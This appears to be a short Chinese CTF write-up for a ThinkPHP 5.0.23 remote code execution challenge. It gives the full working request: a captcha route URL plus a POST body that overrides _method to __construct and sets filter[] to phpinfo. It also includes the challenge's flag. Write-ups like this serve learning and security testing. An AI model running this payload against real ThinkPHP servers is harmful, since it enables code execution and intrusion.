[ThinkPHP]5.0.23-Rce 1

[ThinkPHP]5.0.23-Rce 1

根据题目知道这是一个5.0.23的PHP RCE,话不多说直接上扫描器

image-20241105074629529

检测出Payload

url地址:
?s=captcha&test=-1 

Post表单参数: 
_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1

HackBar构造payload,访问成功执行到phpinfo页面

image-20241105075013554

ctrf+f 成功找到flag

image-20241105075051782

flag{9bf3ef01-5e80-42a0-b544-9808a1fd3bb2}

posted @   TazmiDev  阅读(77)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示